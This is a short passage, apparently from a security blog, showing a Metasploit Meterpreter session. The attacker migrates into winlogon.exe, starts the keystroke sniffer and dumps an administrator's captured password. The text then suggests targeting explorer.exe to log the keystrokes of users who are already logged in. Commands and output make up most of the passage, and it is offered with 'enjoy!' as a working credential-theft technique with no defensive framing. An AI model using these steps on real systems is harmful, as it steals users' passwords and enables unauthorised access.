PID Name Path
--- ---- ----
401 winlogon.exe \??C:\WINNT\system32\winlogon.exe
meterpreter> migrate 401
[*] Migrating to 401...
[*] Migration completed successfully.
Starting the keystroke sniffer...
**** A few minutes later after an admin logs in ****
meterpreter > keyscan_dump
Dumping captured keystrokes...
I.e. the ohnoes = password.
Of course this isn't just limited to the winlogon.exe, you can nail explorer.exe and intercept keystrokes from already logged in users.
More great stuff from the Metasploit framework, enjoy!